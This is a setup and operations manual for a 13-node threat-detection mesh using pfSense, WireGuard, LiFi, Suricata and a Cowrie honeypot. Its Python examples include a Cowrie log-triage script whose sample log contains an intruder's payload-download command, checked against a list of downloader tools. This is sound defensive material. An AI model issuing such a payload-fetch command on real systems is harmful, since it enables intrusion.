1. Introduction
The Ambient Invisible Intelligence Mesh (AIIM) Network is a distributed system built for cyber observability and autonomous threat detection. Its Linux nodes run Ubuntu Server 24.04 LTS with an Ubuntu Pro subscription attached (Node 0 runs pfSense, which is FreeBSD-based), and the thirteen nodes form a mesh with a fully connected logical topology that the project likens to Metatron's Cube. Docker containers isolate services, LiFi links carry internal traffic, and WireGuard tunnels provide encrypted external connectivity. This manual guides network administrators and IT professionals through setting up, configuring, operating and maintaining the AIIM Network, and describes the design as of April 2, 2025.
1.1 Purpose
The primary purpose of the AIIM Network is to establish a resilient platform capable of continuously monitoring and analyzing network traffic, detecting potential threats in real-time, and maintaining secure, encrypted communication channels across its distributed nodes. This network leverages state-of-the-art technologies such as LiFi—a light-based communication protocol—and AI-driven anomaly detection powered by frameworks like TensorFlow and PyTorch. It aims to provide a pioneering solution for cybersecurity challenges, offering unparalleled observability and rapid response capabilities to safeguard sensitive data and infrastructure in an increasingly interconnected world.
1.2 Key Features
- 13-Node Mesh Network: A fully connected K₁₃ logical topology in which every node can address every other node directly, giving high redundancy at the overlay level (section 2.5 explains how this maps onto the physical links).
- Operating System: Ubuntu Server 24.04 LTS with Ubuntu Pro attached on all Linux nodes; Node 0 runs pfSense.
- Containerization: Docker isolates services and makes deployments portable across heterogeneous hardware.
- LiFi Technology: Light-based internal LAN at roughly 100 Mbps. Line of sight (LOS) means an eavesdropper must be in the beam path, which removes the cable-tap and RF-sniffing exposure of copper and Wi-Fi; it is not a substitute for encryption.
- WireGuard VPN: Lightweight, high-performance tunnels for external links, with a fixed modern cipher suite and minimal overhead.
- Threat Detection: Cowrie honeypots to attract and record attackers, and Suricata for intrusion detection.
- AI Integration: TensorFlow and PyTorch models for anomaly detection and threat scoring.
1.3 Audience
This manual targets network administrators, cybersecurity professionals, and IT specialists with a foundational understanding of Linux-based systems, containerization technologies, and network security principles. Readers are expected to possess working knowledge of Ubuntu Server administration, Docker container management, and basic networking concepts such as IP addressing, routing, and VPN configuration. Familiarity with command-line interfaces (CLI) and system troubleshooting is also assumed to fully leverage the detailed instructions provided herein.
1.4 Scope and Context
Developed as a proof-of-concept for advanced cyber observability, the AIIM Network combines a graph-theoretic design (the K₁₃ topology) with practical implementations of LiFi and containerized microservices. This manual covers the complete lifecycle of the network, from hardware preparation and software installation to operational monitoring and security hardening, and gives context for deployment in enterprise security, research labs, or edge computing environments. It makes no claims about the network's size relative to other deployments; the focus is on technical merit.
2. Network Architecture
The AIIM Network is organized as a 13-node mesh with a fully connected logical topology, K₁₃ in graph-theory terms: every node has a direct logical adjacency to every other node, so no node depends on an intermediary to exchange data with another, which is what a continuous observability and detection system needs. Section 2.5 explains how this overlay relates to the physical links, which are considerably less redundant than the logical graph.
2.1 Nodes and Roles
- pfSense (Node 0)
  Role: Central firewall and VPN gateway; the only ingress and egress point between the LAN and the internet.
  Services: Inbound and outbound filtering with NAT, DHCP for the LAN, and the WireGuard server that terminates the tunnels from Nodes 1 and 2.
  IP Address: 10.0.0.1/24 (LAN; this matches the LAN configuration in section 4.3), dynamically assigned WAN IP.
- IONOS-VPS1 (Node 1)
  Role: Cloud-hosted external gateway that bridges the internal mesh to external networks.
  Services: Nginx reverse proxy, WireGuard client, Tor exit node, and Suricata for intrusion detection. A Tor exit attracts abuse reports and hostile traffic: run it in its own container with no route into the tunnel, and expect the provider's acceptable-use policy to apply.
  IP Address: 65.38.96.106 (public).
- IONOS-VPS2 (Node 2)
  Role: Cloud-hosted honeypot that attracts and records malicious activity.
  Services: Cowrie SSH/Telnet honeypot (Cowrie listens on 2222 and 2223 by default, so move the real sshd to another port and redirect 22 and 23 to Cowrie), WireGuard client, and a Tor relay. The honeypot must have no path into the mesh beyond shipping its logs.
  IP Address: 74.208.11.214 (public).
- ASUS-Aspire (Node 3)
  Role: Internal web and DNS server for network services and name resolution.
  Services: Nginx for web hosting and Bind9 for DNS.
  IP Address: 10.0.0.50/24.
- HPMini (Node 4)
  Role: Sensor hub that brings physical monitoring into the network.
  Services: HAProxy for load balancing and MotionEye for camera feeds.
  IP Address: 10.0.0.20/24.
- Proxmox-Server (Node 5)
  Role: Virtualization host for Nodes 7-12.
  Services: Proxmox manages the virtual machines; a Docker Swarm manager on this host orchestrates containers across the nodes (Swarm schedules containers, not VMs).
  IP Address: 10.0.0.171/24.
- Legion-Laptop (Node 6)
  Role: AI inference node for anomaly detection and threat analysis.
  Services: TensorFlow for machine learning and an SSH server for remote access.
  IP Address: 192.168.1.7 as inherited. This lies outside the 10.0.0.0/24 LAN used by every other internal node, so give it a 10.0.0.0/24 address (or route between the two subnets on pfSense) before expecting LiFi-LAN reachability.
- Proxmox-VM2 to Proxmox-VM7 (Nodes 7-12)
  Roles: Specialized service VMs hosted on Proxmox-Server. All six share Node 5's physical link and transceiver, so a failure of Node 5 takes them all down (see 2.5).
  - Node 7 (Proxmox-VM2): Analytics with Elasticsearch (10.0.0.172/24).
  - Node 8 (Proxmox-VM3): Backup with BorgBackup (10.0.0.173/24).
  - Node 9 (Proxmox-VM4): Staging environment with Nginx (10.0.0.174/24).
  - Node 10 (Proxmox-VM5): Monitoring with Prometheus (10.0.0.175/24).
  - Node 11 (Proxmox-VM6): Database management with PostgreSQL (10.0.0.176/24).
  - Node 12 (Proxmox-VM7): Load balancing with HAProxy (10.0.0.177/24).
2.2 Connectivity
The AIIM Network employs a dual-tier connectivity model to balance internal efficiency and external security:
- LAN Connectivity: Internal communication uses LiFi transceivers providing roughly 100 Mbps within a compact cube about 1 m on a side (1 m³; the earlier "1m²" is an area, not a volume). Because LiFi requires line of sight, an eavesdropper must sit in the optical path, which removes the cable-tap and RF-sniffing risks of copper and Wi-Fi; it does not encrypt anything, so treat LiFi as transport and keep WireGuard or TLS on top of it. With one transceiver per node (section 3.1), each node has one optical link, so the K₁₃ "every node to every node" adjacency is a logical overlay on the LiFi LAN rather than twelve separate beams per node.
- External Connectivity: The external nodes (IONOS-VPS1 and IONOS-VPS2) reach the internal mesh through WireGuard tunnels to pfSense over the public internet. The tunnels authenticate both ends and encrypt all traffic between the geographically separated nodes.
2.3 Topology Diagram
*(Note: In a production environment, include an SVG or PNG diagram here illustrating the 13-node topology. Green dashed lines represent LiFi connections; orange solid lines indicate WireGuard VPN links. A legend should explain line styles, colors, and node roles.)*
2.4 Communication Protocols
- LiFi: Internal LAN communication at roughly 100 Mbps. IEEE 802.15.7 is the standard for visible light communication (VLC); commercial transceivers, including pureLiFi's, are generally built on the 802.11 family instead, which IEEE 802.11bb (2023) extends to light communication. Check which standard the purchased hardware actually implements.
- WireGuard: Encrypted tunnels for external links. Its cipher suite is fixed (Curve25519 key exchange, ChaCha20-Poly1305 AEAD, BLAKE2s, HKDF), so there are no cipher settings to tune; security rests on key handling and on AllowedIPs.
- TCP/IP: The foundation for all communication, with pfSense handling routing and NAT.
2.5 Resilience and Fault Tolerance
The K₁₃ topology gives the logical mesh high connectivity:
- Edge Connectivity (λ): 12, meaning at least 12 links must fail before any node is cut off from the rest.
- Vertex Connectivity (κ): 12, the conventional value for a complete graph. Removing any set of nodes from K₁₃ leaves a smaller complete graph, so node failures can never partition the logical mesh, only shrink it.
These figures describe the overlay, not the hardware. Nodes 7-12 are VMs on Node 5 and Nodes 1-2 reach the mesh only through Node 0's WireGuard endpoint, so a single failure of Node 5 or Node 0 partitions the physical network. Plan the redundancy in section 9.7 against the physical graph, not the logical one.
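The difference between the logical and physical connectivity can be checked rather than asserted. The script below is an added example, not part of the original manual: it builds K₁₃ and a constructed approximation of the physical graph from section 2.1 (Nodes 1-2 hang off Node 0's tunnel endpoint, Nodes 7-12 off their host Node 5, and the five remaining hosts share the LiFi LAN), then finds which single nodes, if any, disconnect each graph. The LAN membership and the node numbering are assumptions taken from the node list.

```python
"""Logical (K13) versus physical connectivity of the AIIM mesh.

Added example, not from the original manual. The physical graph is a
constructed approximation of section 2.1: Nodes 7-12 are VMs reachable
only through Node 5, Nodes 1-2 are VPSs reachable only through the
WireGuard endpoint on Node 0, and Nodes 0, 3, 4, 5, 6 share the LiFi LAN.
"""
from itertools import combinations

NODES = list(range(13))


def complete_graph(nodes):
    """Adjacency sets for K_n: every node linked to every other node."""
    return {v: {u for u in nodes if u != v} for v in nodes}


def physical_graph():
    """Constructed physical-path graph (assumption, see module docstring)."""
    adj = {v: set() for v in NODES}

    def link(a, b):
        adj[a].add(b)
        adj[b].add(a)

    lan = [0, 3, 4, 5, 6]              # hosts with their own LiFi transceiver
    for a, b in combinations(lan, 2):
        link(a, b)
    for vps in (1, 2):                 # VPSs enter only via pfSense's tunnel
        link(0, vps)
    for vm in range(7, 13):            # VMs share Node 5's single link
        link(5, vm)
    return adj


def is_connected(adj, removed=frozenset()):
    """Depth-first search over the graph with `removed` vertices deleted."""
    alive = [v for v in adj if v not in removed]
    if not alive:
        return True
    seen, stack = {alive[0]}, [alive[0]]
    while stack:
        v = stack.pop()
        for u in adj[v]:
            if u not in removed and u not in seen:
                seen.add(u)
                stack.append(u)
    return len(seen) == len(alive)


def edge_count(adj):
    return sum(len(n) for n in adj.values()) // 2


def articulation_points(adj):
    """Vertices whose removal alone partitions the graph (kappa <= 1 if non-empty)."""
    return sorted(v for v in adj if not is_connected(adj, frozenset({v})))


def min_vertex_cut_size(adj, limit=3):
    """Size of the smallest vertex set (up to `limit`) whose removal partitions the graph, else None."""
    for k in range(1, limit + 1):
        for cut in combinations(adj, k):
            if not is_connected(adj, frozenset(cut)):
                return k
    return None


if __name__ == "__main__":
    k13, phys = complete_graph(NODES), physical_graph()
    print("K13: edges", edge_count(k13), "cut vertices", articulation_points(k13))
    print("physical: edges", edge_count(phys), "cut vertices", articulation_points(phys))
```

K₁₃ has 78 edges and no vertex cut of any size up to the search limit, while the physical graph has 18 edges and two single points of failure, Node 0 and Node 5. Any redundancy plan should start from the second result.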
2.6 Design Rationale
Inspired by Metatron's Cube, the fully connected K₁₃ topology maximizes communication pathways, reducing latency and enhancing fault tolerance. LiFi offers a forward-thinking approach to LAN connectivity by prioritizing security and bandwidth efficiency, while WireGuard provides a simple, high-performance solution for external VPN needs.
3. Hardware and Software Requirements
3.1 Hardware Requirements
Deploying the AIIM Network as described requires the following hardware. The inherited list is internally inconsistent: Nodes 1-12 are assigned below (and in section 2.1) to VPSs, PCs and VMs, so the thirteen Raspberry Pi 5s cannot also be Nodes 0-12. Decide what role the Pis fill (for example as LiFi LAN endpoints) before procurement. Note also that pfSense runs only on amd64 hardware or VMs, not on a Raspberry Pi, so Node 0 needs an x86-64 machine.
- 13 Raspberry Pi 5s: Each with 8 GB RAM, listed as the backbone for Nodes 0-12 and suited to containerized workloads and LiFi integration (see the note above).
- IONOS VPS #1: A virtual private server with 16 GB RAM for Node 1's external gateway functions.
- IONOS VPS #2: An 8 GB RAM VPS for Node 2, the honeypot and external relay.
- ASUS Server: 64 GB RAM, for the web and DNS services of Node 3.
- Desktop i5: 32 GB RAM, for Node 4's sensor hub and camera integration.
- Mini PC: 32 GB RAM, for Node 5's virtualization duties.
- Legion Slim 5: A 64 GB RAM laptop for Node 6's AI inference workloads.
- LiFi Transceivers: One per node (e.g., pureLiFi LiFi-XC) for light-based LAN connectivity.
- Camera: A USB or IP camera attached to Node 4 for MotionEye surveillance.
3.2 Software Requirements
The software stack is selected to support the network’s distributed architecture:
- Ubuntu Server 24.04 LTS with Ubuntu Pro attached: The OS for all Linux nodes, giving a stable base with extended security maintenance (Node 0 runs pfSense instead).
- Docker: For containerization, enabling isolated, portable service deployments.
- WireGuard: For secure VPN tunneling, providing lightweight encryption and high performance.
- pfSense: For firewall and VPN gateway functionality on Node 0.
- Nginx: For web server and reverse proxy services (Nodes 1, 3, and others).
- Bind9, HAProxy, MotionEye: For DNS resolution, load balancing, and camera management respectively.
- TensorFlow/PyTorch: For AI-driven anomaly detection on Node 6.
- Suricata and Cowrie: For intrusion detection and honeypot operations (Nodes 1 and 2).
- Prometheus, Elasticsearch, BorgBackup, PostgreSQL: For monitoring, log analytics, backup, and database management (Nodes 7-12).
3.3 Prerequisites
Prior to deployment, ensure stable power supplies, reliable internet connectivity, and proper physical arrangement of devices to meet LiFi LOS requirements.
4. Installation and Configuration
4.1 Preparing the Hardware
Assemble each Raspberry Pi 5 with its power supply, case, heat sink, and attach the LiFi transceiver as per the manufacturer’s guidelines. Provision the VPS instances via the IONOS dashboard and set up the ASUS Server, Desktop, Mini PC, and Legion Laptop with appropriate network connections.
4.2 Installing Ubuntu Server
Download the Ubuntu Server 24.04 LTS ISO from ubuntu.com; there is no separate "Pro" ISO. Ubuntu Pro is attached to a standard installation after first boot with `sudo pro attach <token>`. Write the ISO to a USB stick with Rufus or Etcher, boot the device and follow the installer prompts. Raspberry Pi nodes use the preinstalled Ubuntu Server image written with Raspberry Pi Imager rather than the ISO. For VPS instances, select Ubuntu Server 24.04 during provisioning. Node 0 is installed from the pfSense installer, not from Ubuntu.
4.3 Configuring Network Interfaces
For LiFi connectivity, install the transceiver driver, then give each node a static address in the 10.0.0.0/24 subnet in `/etc/netplan/01-netcfg.yaml`. Restrict the file to root (`sudo chmod 600 /etc/netplan/01-netcfg.yaml`; netplan warns when it is world-readable), validate with `sudo netplan try`, which rolls the change back automatically if connectivity is lost, and then apply it with `sudo netplan apply`. Configure pfSense with its LAN interface on 10.0.0.1/24 and its WAN interface as the ISP requires.
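A complete netplan file for Node 3 (ASUS-Aspire, 10.0.0.50/24, which also runs Bind9), added here as an example rather than taken from the original manual. The interface name `lifi0` is an assumption; substitute the name the LiFi driver exposes in `ip link`.

```yaml
# /etc/netplan/01-netcfg.yaml on Node 3 (ASUS-Aspire). Added example, not
# from the original manual. "lifi0" is an assumed interface name.
network:
  version: 2
  renderer: networkd
  ethernets:
    lifi0:
      dhcp4: false
      addresses:
        - 10.0.0.50/24
      routes:
        - to: default
          via: 10.0.0.1          # pfSense LAN address (section 4.3)
      nameservers:
        addresses:
          - 10.0.0.50            # Bind9 on this node; other nodes point here as well
```

Other LAN nodes use the same file with their own address from section 2.1 and `10.0.0.50` as the resolver; `sudo netplan try` before `sudo netplan apply` avoids locking yourself out of a node whose only link is the optical one.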
4.4 Setting Up Docker and Swarm
sudo apt update
sudo apt install -y docker.io
sudo systemctl enable --now docker
# On Node 5 (Proxmox-Server): create the swarm and print the worker join command
docker swarm init --advertise-addr 10.0.0.171
docker swarm join-token worker
# On every other node, run the printed command (the token is shown as a placeholder)
docker swarm join --token <token> 10.0.0.171:2377
# Swarm needs 2377/tcp (management), 7946/tcp+udp (gossip) and 4789/udp (overlay) open between nodes.
# Nodes 1 and 2 join over their WireGuard tunnel addresses, never over their public IPs.
4.5 Configuring WireGuard VPN
On Node 0, install the pfSense WireGuard package and create the tunnel and its peers under VPN > WireGuard, generating the key pair there. On Nodes 1 and 2, install WireGuard (`sudo apt install -y wireguard`), generate keys with `umask 077; wg genkey | tee /etc/wireguard/private.key | wg pubkey`, and write `/etc/wireguard/wg0.conf` following Appendix A. Use a tunnel subnet that does not overlap the 10.0.0.0/24 LAN. Because pfSense's WAN address is dynamic, either publish it through dynamic DNS or let pfSense initiate to the fixed VPS endpoints with PersistentKeepalive so the tunnels survive an address change.
4.6 Deploying Containers
Deploy the containerized services with Docker (or as Swarm services): Nginx and Suricata on Node 1, Cowrie on Node 2, TensorFlow on Node 6, and so on. pfSense on Node 0 is not a container; it is a FreeBSD-based appliance installed directly on the hardware or in a VM. Pin image tags, set ports, volumes and environment variables per service, and grant only the capabilities a service needs (Suricata, for instance, needs host networking plus NET_ADMIN and NET_RAW to sniff, not `--privileged`).
4.7 Setting Up LiFi Transceivers
Follow the pureLiFi guidelines to pair each transceiver. Test connectivity using ping to verify communication within the 10.0.0.x subnet.
4.8 Configuring MotionEye
sudo apt install -y motion
# MotionEye is not packaged in the Ubuntu archives; install it following the project's
# instructions (pip inside a virtualenv, or its container image). That installer provides
# the motioneye systemd unit used below.
sudo systemctl enable motioneye
sudo systemctl start motioneye
5. Operation and Maintenance
5.1 Monitoring
Deploy Prometheus on Node 10:
docker run -d --name prometheus -p 10.0.0.175:9090:9090 -v /etc/prometheus/prometheus.yml:/etc/prometheus/prometheus.yml:ro -v prometheus-data:/prometheus prom/prometheus
Configure /etc/prometheus/prometheus.yml to scrape every node (node_exporter on port 9100 is the usual per-host agent) and add Grafana for dashboards. Publish port 9090 on the LAN address only, as above: Prometheus has no authentication of its own.
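A scrape configuration covering the node list from section 2.1, added as an example that is not part of the original manual. It assumes node_exporter listens on 9100 on every node, that Nodes 1 and 2 are scraped over their WireGuard tunnel addresses (placeholders below), and that Node 6 is added once it has a 10.0.0.0/24 address.

```yaml
# /etc/prometheus/prometheus.yml on Node 10 (Proxmox-VM5). Added example, not
# from the original manual; node_exporter on :9100 everywhere is an assumption.
global:
  scrape_interval: 15s
  evaluation_interval: 15s

scrape_configs:
  - job_name: prometheus
    static_configs:
      - targets: ["localhost:9090"]

  - job_name: node
    static_configs:
      - labels: {zone: lifi-lan}
        targets:
          - 10.0.0.1:9100       # Node 0 pfSense (only if its node_exporter package is installed)
          - 10.0.0.50:9100      # Node 3 ASUS-Aspire
          - 10.0.0.20:9100      # Node 4 HPMini
          - 10.0.0.171:9100     # Node 5 Proxmox-Server
          - 10.0.0.172:9100     # Node 7 Elasticsearch
          - 10.0.0.173:9100     # Node 8 BorgBackup
          - 10.0.0.174:9100     # Node 9 staging Nginx
          - 10.0.0.175:9100     # Node 10 (this host)
          - 10.0.0.176:9100     # Node 11 PostgreSQL
          - 10.0.0.177:9100     # Node 12 HAProxy
      - labels: {zone: wireguard}
        targets:
          - <vps1_tunnel_ip>:9100   # Node 1 IONOS-VPS1, via the tunnel, never the public IP
          - <vps2_tunnel_ip>:9100   # Node 2 IONOS-VPS2
```

The `zone` label lets dashboards and alert rules separate optical-LAN nodes from tunnel nodes, which have very different latency baselines; an `up == 0` alert per zone is the simplest useful rule to add first.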
5.2 Updating Software
sudo apt update
sudo apt upgrade -y
# Swarm services: roll the new image out without losing the service definition
docker service update --image <image>:<tag> <service>
# Stand-alone containers: recreate them from their Compose file rather than by hand,
# so ports, volumes and environment variables are not lost on the re-run
docker compose pull && docker compose up -d
5.3 Backup and Recovery
export BORG_PASSPHRASE='<passphrase>'   # or BORG_PASSCOMMAND; keep it out of shell history
borg init -e repokey /backup
borg create --stats /backup::daily-{now} /data
borg prune --keep-daily 7 --keep-weekly 4 --keep-monthly 6 /backup && borg compact /backup
Export the repository key with `borg key export` and keep it, with the passphrase, somewhere other than Node 8; a repokey repository cannot be read without both.
5.4 Log Management
Deploy Elasticsearch on Node 7 as the central log store (Suricata's eve.json and Cowrie's JSON log both ingest directly). Keep its built-in security enabled (TLS and authentication are on by default in 8.x), bind it to the LAN address only, and set index lifecycle (ILM) policies for retention.
6. Security Considerations
6.1 Firewall Configuration
On pfSense, default-deny inbound on WAN and allow only 51820/udp (WireGuard); do not expose 22, 80 or 443 on the WAN side. SSH to internal nodes goes through the tunnel, and the only host that deliberately exposes SSH to the internet is the Cowrie honeypot on Node 2. On the LAN, nodes reach each other directly over LiFi without crossing pfSense, so restrict node-to-node traffic to the ports each service uses (22, 80, 443, 9090 and so on) with each node's host firewall (nftables or ufw). Add traffic shaping only if needed.
6.2 Encryption and Key Management
WireGuard's cipher suite is fixed, so there are no ciphers to enforce; what you manage is keys. Generate each private key on the node that will use it, keep it mode 600 under /etc/wireguard, restrict AllowedIPs to the minimum each peer needs, and rotate peer keys every 90 days (add the new public key on the far side before removing the old one so the tunnel never drops). A per-peer PresharedKey adds a symmetric layer on top of the handshake. LiFi transceivers provide no encryption to rely on; keep WireGuard or TLS end-to-end across the optical links.
6.3 Intrusion Detection and Honeypots
Run Suricata in IDS mode on Node 1 (af-packet on the public interface and on wg0, so both internet-facing and tunnel traffic are inspected), keep rules current with `suricata-update`, and ship eve.json to Elasticsearch. Suricata on Node 1 sees only that host's traffic; to inspect the LAN it must run on pfSense or on a node that receives a mirror of the LiFi link. On Node 2, run Cowrie as its own unprivileged user, move the real sshd off port 22 and redirect 22 to Cowrie's 2222 with nftables, and treat everything that reaches Cowrie as hostile: captured credentials, commands and download URLs feed pfSense block lists and Suricata rules.
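Turning Cowrie's log into the block-list material mentioned above is mostly a matter of reassembling sessions. The script below is an added example, not part of the original manual or of Cowrie: it parses Cowrie's one-JSON-object-per-line log (the field names eventid, session, src_ip, username, password and input are Cowrie's), rebuilds each session, and reports the ones where the intruder got a shell and ran something, together with any URLs they tried to fetch. The log lines are constructed for this example.

```python
"""Session-level triage of Cowrie's JSON log (Node 2).

Added example, not part of the original manual or of the Cowrie project.
SAMPLE_LOG is constructed: one intruder that logs in and drops a downloader,
one that fails a login and leaves.
"""
import json

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2025-04-02T10:00:01.000000Z"}
{"eventid":"cowrie.login.failed","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","username":"root","password":"123456","timestamp":"2025-04-02T10:00:02.000000Z"}
{"eventid":"cowrie.login.success","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","username":"root","password":"admin","timestamp":"2025-04-02T10:00:03.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","input":"uname -a","timestamp":"2025-04-02T10:00:04.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh","timestamp":"2025-04-02T10:00:05.000000Z"}
{"eventid":"cowrie.session.closed","session":"a1b2c3d4e5f6","src_ip":"203.0.113.7","timestamp":"2025-04-02T10:00:06.000000Z"}
{"eventid":"cowrie.session.connect","session":"0f0f0f0f0f0f","src_ip":"198.51.100.23","timestamp":"2025-04-02T10:05:00.000000Z"}
{"eventid":"cowrie.login.failed","session":"0f0f0f0f0f0f","src_ip":"198.51.100.23","username":"admin","password":"admin","timestamp":"2025-04-02T10:05:01.000000Z"}
{"eventid":"cowrie.session.closed","session":"0f0f0f0f0f0f","src_ip":"198.51.100.23","timestamp":"2025-04-02T10:05:02.000000Z"}
"""

DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")


def parse_events(text):
    """Yield one dict per well-formed line; a truncated line must not stop the triage."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def sessions(events):
    """Rebuild per-session state: source, credentials tried, outcome, commands run."""
    out = {}
    for ev in events:
        sid = ev.get("session")
        if sid is None:
            continue
        s = out.setdefault(sid, {"src_ip": ev.get("src_ip"), "creds": [],
                                 "success": False, "commands": []})
        eid = ev.get("eventid")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["creds"].append((ev.get("username"), ev.get("password")))
            s["success"] = s["success"] or eid == "cowrie.login.success"
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
    return out


def download_urls(commands):
    """URLs passed to download tools: the indicators worth blocking on pfSense."""
    urls = []
    for cmd in commands:
        words = cmd.split()
        if any(tool in words for tool in DOWNLOADERS):
            urls.extend(w for w in words if w.startswith(("http://", "https://", "ftp://")))
    return urls


def triage(text):
    """Sessions in which the intruder authenticated and then ran commands."""
    report = []
    for sid, s in sessions(parse_events(text)).items():
        if s["success"] and s["commands"]:
            report.append({"session": sid, "src_ip": s["src_ip"], "creds": s["creds"],
                           "commands": s["commands"], "urls": download_urls(s["commands"])})
    return report


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["src_ip"], hit["creds"], hit["urls"])
```

Run it against the real `cowrie.json` on Node 2 by passing the file contents to `triage`; the `src_ip` values go into a pfSense alias for a block rule, and the URLs become Suricata content matches or DNS sinkhole entries.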
6.4 AI-Driven Anomaly Detection
Train the models on Node 6 from historical flow and alert data (Suricata EVE records and Prometheus metrics provide the features), validate them on a held-out period so the false-positive rate is known before deployment, then score live data and alert above a threshold. Log every score, retrain on a schedule, and treat a sudden drop in anomaly volume as seriously as a spike: it may mean the sensor feeding the model has gone blind.
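The train-then-score loop above can be shown without the ML frameworks. The block below is an added example, not part of the original manual: it stands in for the TensorFlow/PyTorch model with a per-feature statistical baseline (z-scores against a training period) so it runs with the standard library alone. The feature layout (flows, bytes and distinct destination ports per host per minute, as one would aggregate from Suricata flow events) and every window in it are constructed for the example.

```python
"""Baseline-and-score anomaly detection over per-host traffic windows.

Added example, not from the original manual. A statistical baseline stands
in for the TensorFlow/PyTorch model on Node 6; the feature layout and all
sample windows are constructed.
"""
from statistics import mean, pstdev

FEATURES = ("flows", "bytes", "dst_ports")

# Constructed training windows: one minute each for a host with steady traffic.
HISTORY = [
    {"flows": 12, "bytes": 40_000, "dst_ports": 2},
    {"flows": 14, "bytes": 42_500, "dst_ports": 2},
    {"flows": 11, "bytes": 39_000, "dst_ports": 2},
    {"flows": 13, "bytes": 41_000, "dst_ports": 3},
    {"flows": 12, "bytes": 40_800, "dst_ports": 2},
    {"flows": 15, "bytes": 43_000, "dst_ports": 2},
]

# Constructed live windows: a normal minute, then a minute that looks like a port scan.
LIVE = [
    {"host": "10.0.0.20", "flows": 13, "bytes": 41_500, "dst_ports": 2},
    {"host": "10.0.0.20", "flows": 900, "bytes": 60_000, "dst_ports": 400},
]


def fit_baseline(windows):
    """Per-feature mean and standard deviation from the training period."""
    base = {}
    for f in FEATURES:
        vals = [w[f] for w in windows]
        mu, sd = mean(vals), pstdev(vals)
        # floor the deviation so a near-constant feature cannot yield infinite scores
        base[f] = (mu, max(sd, 0.05 * abs(mu), 1e-9))
    return base


def score(window, baseline):
    """Largest absolute z-score across features and the feature that produced it."""
    worst_z, worst_f = 0.0, None
    for f, (mu, sd) in baseline.items():
        z = abs(window[f] - mu) / sd
        if z > worst_z:
            worst_z, worst_f = z, f
    return worst_z, worst_f


def detect(windows, baseline, threshold=4.0):
    """Alert on every window whose worst feature is `threshold` deviations from baseline."""
    alerts = []
    for w in windows:
        z, f = score(w, baseline)
        if z >= threshold:
            alerts.append({"host": w["host"], "feature": f, "z": round(z, 1)})
    return alerts


if __name__ == "__main__":
    base = fit_baseline(HISTORY)
    for a in detect(LIVE, base):
        print(f"{a['host']}: {a['feature']} is {a['z']} sd from baseline")
```

The normal window scores well under the threshold; the scan window is flagged on `dst_ports`, the feature that moved furthest relative to its own variance, which is the explanation an analyst wants alongside the alert. Replacing `fit_baseline` and `score` with a trained model keeps the rest of the loop unchanged.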
7. Troubleshooting
7.1 Node Connectivity Issues
Check: LiFi alignment, static IP configurations, and netplan settings.
Fix: Re-align transceivers, update IP settings in /etc/netplan, and apply with sudo netplan apply.
7.2 VPN Failures
Check: `wg show` on Nodes 1 and 2 (a missing or stale "latest handshake" means the keys, endpoint or firewall are wrong), and the WAN rule for 51820/udp on pfSense.
Fix: Confirm that each side's configured public key matches the other side's private key, that AllowedIPs covers the addresses being sent, and that the endpoint still points at pfSense's current WAN address; regenerate keys only after those checks pass.
7.3 Container Failures
Check: Container logs using docker logs <container> and resource usage.
Fix: Increase resource limits or redeploy containers.
8. Appendices
Appendix A: Sample WireGuard Config
[Interface]
# Node 0 (pfSense) side in wg-quick syntax; on pfSense the same values are entered in the WireGuard package GUI.
PrivateKey = <private_key>
# Example tunnel subnet: pick any range that does not overlap the 10.0.0.0/24 LAN, or routing breaks.
Address = 10.10.0.1/24
ListenPort = 51820
[Peer]
# IONOS-VPS1 (Node 1)
PublicKey = <peer_public_key>
AllowedIPs = 10.10.0.2/32
Endpoint = 65.38.96.106:51820
PersistentKeepalive = 25
The mirror configuration on Node 1 uses Address = 10.10.0.2/24, pfSense's public key, and AllowedIPs = 10.10.0.1/32, 10.0.0.0/24 so that LAN traffic is routed into the tunnel. Node 2 is a second [Peer] block with its own key and tunnel address.
Appendix B: Docker Compose for Node 1 (Nginx reverse proxy)
pfSense is a FreeBSD-based appliance installed on bare metal or in a VM, not a Docker container, and there is no official pfSense container image, so the Node 0 firewall is not deployed through Compose. The file below is for the Nginx reverse proxy on Node 1. `network_mode: host` and `ports:` are mutually exclusive, so only `ports:` is used.
services:
  nginx:
    image: nginx:stable
    restart: unless-stopped
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./nginx/conf.d:/etc/nginx/conf.d:ro
      - ./nginx/certs:/etc/nginx/certs:ro
Key Points
- Scalability, hierarchical design, and QoS are critical to future-proofing the network.
- Redundancy and failover mechanisms are essential to maintain continuous operations.
- Comprehensive performance monitoring and automated security measures ensure operational excellence.
9. Additional Network Principles and Enhancements
9.1 Principles Not Covered Above
The Ambient Invisible Intelligence Mesh (AIIM) Network is a 13-node system for cyber observability and threat detection. The earlier sections cover architecture, installation and basic security, but several network design principles have not been addressed: hierarchical design, modularity, Quality of Service (QoS), scalability planning, network segmentation, performance monitoring, redundancy and failover, and adherence to industry standards.
The following sections treat these principles in turn, so that this manual also serves as a reference for implementing them in a high-performance, secure and scalable infrastructure.
9.2 Hierarchical Design and Modularity
9.2.1 Hierarchical Network Design
Hierarchical network design is a proven strategy in managing large-scale networks. It divides the network into layers—core, distribution, and access—each with distinct responsibilities. For the AIIM Network:
- Core Layer: Central nodes (such as pfSense) manage high-speed backbone traffic and interface with external networks.
- Distribution Layer: Intermediate nodes (like Proxmox-Server and Legion-Laptop) handle traffic routing and load balancing, providing a buffer between the core and access layers.
- Access Layer: End-point nodes (such as ASUS-Aspire and HPMini) deliver services and connect end devices to the network.
In a network whose nodes are directly connected, these layers are an administrative grouping rather than a physical hierarchy: they do not by themselves shrink the single LiFi broadcast domain (that needs the subnets or VLANs of section 9.5), but they do bound the cost of change. Adding a node in the access layer means configuring that node and its distribution peer, not every node in the mesh, and troubleshooting can follow the layer boundaries.
9.2.2 Modularity
